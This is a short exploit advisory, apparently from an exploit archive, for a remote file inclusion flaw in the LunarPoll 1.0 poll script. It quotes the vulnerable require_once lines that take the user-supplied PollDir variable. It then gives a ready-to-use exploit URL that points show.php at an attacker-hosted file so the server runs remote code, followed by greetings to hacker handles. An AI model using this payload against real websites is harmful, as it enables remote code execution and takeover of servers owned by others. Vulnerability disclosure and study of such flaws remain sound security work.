id: 1385
date: 01/12/2007
title: LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability
author: ilker Kandemir
cves: 

==================================================================
LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability
==================================================================



AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit:  show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR


#  0day.today [2023-03-27]  #